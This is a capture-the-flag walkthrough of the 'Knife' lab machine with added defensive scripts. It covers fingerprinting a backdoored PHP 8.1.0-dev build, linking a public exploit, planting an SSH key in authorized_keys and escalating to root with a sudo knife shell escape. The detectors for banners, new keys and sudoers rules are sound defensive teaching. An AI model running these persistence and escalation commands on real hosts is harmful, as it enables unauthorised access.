# Knife

## Nmap

```
sudo nmap 10.10.10.242 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

With port 80 the only realistic path forward, we view the root page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZQ88vNYksQY9jJpVo5xA%2Fimage.png?alt=media\&token=21b13876-5275-4922-ac13-5232586e94c7)

We find the page is largely unusable, and running `nikto` against the target web server turns up very little useful information.

```
nikto -h http://10.10.10.242
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8M4Ub2iyZAEvD1JI7R3t%2Fimage.png?alt=media\&token=7b359cdb-d499-404b-a172-1df84e8b10a7)

Running `feroxbuster` against the host reveals no interesting files or directories. However, the presence of `/index.php` tells us the server is running PHP.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fla0Fn4LzQWljzNdAcTgJ%2Fimage.png?alt=media\&token=652d1ee5-05cf-42ed-887e-3716116daa3a)

Running ZAP against the web server, we see the HTTP response headers report the server as running `PHP/8.1.0-dev`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqkJmwKHpf4xX8rDNCfsx%2Fimage.png?alt=media\&token=722346d1-0587-46d6-b525-9ba073189ca1)
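The version banner is the whole fingerprint here, so a defender wants the same check automated. The following is an added example, not code from the original write-up: it parses a response head the way a proxy such as ZAP displays it and flags a development or pre-release PHP label. The response text is a constructed sample modelled on the screenshot above; `X-Powered-By` is the header PHP emits when `expose_php` is enabled.

```python
import re
from typing import Dict, Optional

# Constructed sample of a response head as a proxy such as ZAP would show it.
# The Server and X-Powered-By values mirror what the write-up observed; the
# rest is filler so the sample parses like a real response.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 22 May 2021 10:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Development and pre-release labels as PHP prints them: 8.1.0-dev, 8.1.0RC1,
# 8.1.0alpha2. A distro suffix such as 7.4.3-1ubuntu is deliberately not matched.
PRERELEASE_RE = re.compile(r"-?(dev|alpha|beta|rc)\d*$", re.IGNORECASE)


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP response head into a lower-cased name -> value map."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def php_version(headers: Dict[str, str]) -> Optional[str]:
    """Return the version string PHP advertises in X-Powered-By, if any."""
    match = re.match(r"PHP/(\S+)", headers.get("x-powered-by", ""))
    return match.group(1) if match else None


def is_prerelease_php(version: Optional[str]) -> bool:
    """True for development or pre-release labels, which have no place on a
    production host; False when no version is disclosed."""
    return bool(version) and PRERELEASE_RE.search(version) is not None


def assess(raw: str) -> Dict[str, object]:
    """Summarise what a response head discloses about the PHP build."""
    version = php_version(parse_headers(raw))
    return {
        "php_version": version,
        "exposes_version": version is not None,
        "prerelease": is_prerelease_php(version),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_RESPONSE))
```

Two hardening points follow from the check: a `-dev` build should never reach a production host, and setting `expose_php = Off` in `php.ini` (with `ServerTokens Prod` in Apache) stops the banner being advertised at all. Hiding the banner only removes the fingerprint, though; it does nothing about the backdoored build itself.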

A quick Google search for this `PHP` version immediately turns up exploit code.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fw7wOqOF1UXNo5XstVVBS%2Fimage.png?alt=media\&token=cce60bef-d56d-473c-aa18-e8899e83f5bf)

The first result, on exploit-db.com, gives us exploit code and references for the vulnerability.

**Exploit-DB:** <https://www.exploit-db.com/exploits/49933>

**Blog:** <https://flast101.github.io/php-8.1.0-dev-backdoor-rce/>

**Description**

An early release of PHP, the PHP 8.1.0-dev version, was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header. The following exploit uses the backdoor to provide a pseudo shell on the host.

Running the exploit and entering the address of the server when prompted gives us a shell as the user james.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGdCrvvPR1LkjgsgGqTDU%2Fimage.png?alt=media\&token=fc73733d-b406-41bb-99b3-cd051dc295ab)

Next we notice that `/home/james/.ssh` contains the `id_rsa` key pair. We can create an `authorized_keys` file and echo the contents of `id_rsa.pub` into it. This gives us SSH access without any knowledge of the user james' password.

```
# Work inside the user's .ssh directory and create the authorized_keys file
cd /home/james/.ssh
touch authorized_keys

# Echo the contents of id_rsa.pub into authorized_keys (replace the placeholder
# with the actual public key line; the file name must be exactly authorized_keys)
echo "<Contents of id_rsa.pub>" > authorized_keys

# Next, copy id_rsa to the attacking system and SSH in as james.
ssh -i id_rsa james@10.10.10.242
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Ffcw7jv0m4sqkyePt5vr7%2Fimage.png?alt=media\&token=44e7283c-a4b7-4ac4-9783-5e46d3487998)
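What just happened is a textbook persistence technique: a key the administrator never approved now appears in `authorized_keys`. The following added example (not part of the original write-up) shows the detection side: it parses `authorized_keys`, fingerprints each key the way `ssh-keygen -lf` does, and reports entries missing from a previously recorded baseline. Both file contents and the key blobs are constructed stand-ins, not real keys.

```python
import base64
import hashlib
from typing import Dict, List


def _constructed_blob(label: str) -> str:
    """Base64 stand-in for a key blob, built from a label. NOT a real key; it
    only makes the constructed sample lines parse like authorized_keys entries."""
    return base64.b64encode(label.encode()).decode()


# Constructed sample: the baseline an administrator recorded earlier, and the
# file as found now, with one line appended in the way the write-up describes
# (the user's own id_rsa.pub echoed into authorized_keys).
BASELINE_FILE = (
    "ssh-ed25519 " + _constructed_blob("constructed-admin-key") + " admin@bastion\n"
)
CURRENT_FILE = BASELINE_FILE + (
    "ssh-rsa " + _constructed_blob("constructed-appended-key") + " james@knife\n"
)

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[Dict[str, str]]:
    """Parse authorized_keys lines into type/fingerprint/comment records.
    Leading option fields (from=..., no-pty, ...) are skipped; an option value
    containing spaces inside quotes is not handled by this simple split."""
    entries: List[Dict[str, str]] = []
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        i = 0
        while i < len(fields) and not fields[i].startswith(KEY_TYPE_PREFIXES):
            i += 1
        if i + 1 >= len(fields):
            continue  # no key type / blob pair on this line
        entries.append({
            "type": fields[i],
            "fingerprint": fingerprint(fields[i + 1]),
            "comment": " ".join(fields[i + 2:]),
        })
    return entries


def new_keys(baseline_text: str, current_text: str) -> List[Dict[str, str]]:
    """Entries present now whose fingerprint is absent from the baseline."""
    known = {e["fingerprint"] for e in parse_authorized_keys(baseline_text)}
    return [e for e in parse_authorized_keys(current_text) if e["fingerprint"] not in known]


if __name__ == "__main__":
    for entry in new_keys(BASELINE_FILE, CURRENT_FILE):
        print("unexpected key:", entry["type"], entry["fingerprint"], entry["comment"])
```

A baseline diff like this belongs in a periodic job or a file-integrity monitor; an auditd watch such as `-w /home/james/.ssh/authorized_keys -p wa -k sshkeys` catches the write as it happens. The structural fix is to point `AuthorizedKeysFile` in `sshd_config` at a root-owned location so a compromised user account cannot grant itself key-based access.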

Once in via SSH, we check `sudo -l` for sudo permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FaNcroj11pfEysASCmdFk%2Fimage.png?alt=media\&token=b27ca368-e01d-45e2-8153-a1485a3ff4f0)

We see we can run the `knife` binary as root without supplying a password. Looking at GTFOBins, we see this can be used with `sudo` to escalate privileges.

**GTFOBins:** <https://gtfobins.github.io/gtfobins/knife/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDJQ1IxR8v2VIQWdzd8nD%2Fimage.png?alt=media\&token=7fdfed05-4fa5-4d55-8b6f-f5389fcbe6bc)

```
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHygUQmoHnqSXimxvwdh1%2Fimage.png?alt=media\&token=e1ecf86a-1cf2-49c2-9115-c323b6070dad)
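The root cause is a sudoers rule that hands a shell-capable binary to a user with `NOPASSWD`. As an added example (not from the original write-up), the script below parses user-specification lines from a sudoers file and flags rules that are passwordless or whose command GTFOBins documents as able to spawn a shell. The sudoers excerpt is a constructed sample: the page only shows the rule in the `sudo -l` screenshot, so the exact form of the james line is an assumption.

```python
import re
from typing import Dict, List

# Constructed sudoers excerpt. The write-up only shows the rule in a `sudo -l`
# screenshot, so the james line below is an assumption about its form, not a
# copy of the host's file.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
"""

# Commands that GTFOBins lists as able to break out to a shell under sudo.
# knife is the only one named on this page; extend the set from gtfobins.github.io.
SHELL_ESCAPE_BINARIES = {"/usr/bin/knife"}

# who  where=(as_whom) TAGS: command, command
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
TAG_RE = re.compile(r"([A-Z]+):\s*")


def parse_rules(text: str) -> List[Dict[str, object]]:
    """Parse user-specification lines. Defaults, alias definitions, comments
    and backslash continuation lines are out of scope for this example."""
    rules: List[Dict[str, object]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        spec = m.group("spec")
        tags: List[str] = []
        while True:  # peel off leading tags such as NOPASSWD: / SETENV:
            t = TAG_RE.match(spec)
            if not t:
                break
            tags.append(t.group(1))
            spec = spec[t.end():]
        rules.append({
            "user": m.group("user"),
            "runas": (m.group("runas") or "root").split(":")[0],
            "tags": tags,
            "commands": [c.strip() for c in spec.split(",") if c.strip()],
        })
    return rules


def audit(text: str) -> List[Dict[str, str]]:
    """Flag rules that run as root/ALL and are either passwordless or grant a
    command known to escape to a shell."""
    findings: List[Dict[str, str]] = []
    for rule in parse_rules(text):
        if rule["runas"] not in ("root", "ALL"):
            continue
        nopasswd = "NOPASSWD" in rule["tags"]
        for command in rule["commands"]:
            binary = command.split()[0]
            escape = binary in SHELL_ESCAPE_BINARIES
            if not (escape or nopasswd):
                continue
            reasons = []
            if escape:
                reasons.append("command can spawn a shell (GTFOBins)")
            if nopasswd:
                reasons.append("no password required")
            findings.append({"user": str(rule["user"]), "command": command,
                             "reason": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"{f['user']}: {f['command']} -> {f['reason']}")
```

The `root` and `%sudo` lines are intentionally not reported: they grant everything, but behind a password, which is the normal administrative setup. The fix on a host like this one is to drop the `NOPASSWD` tag and, if `knife` really must run as root, to wrap it so that subcommands such as `exec` are not reachable.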
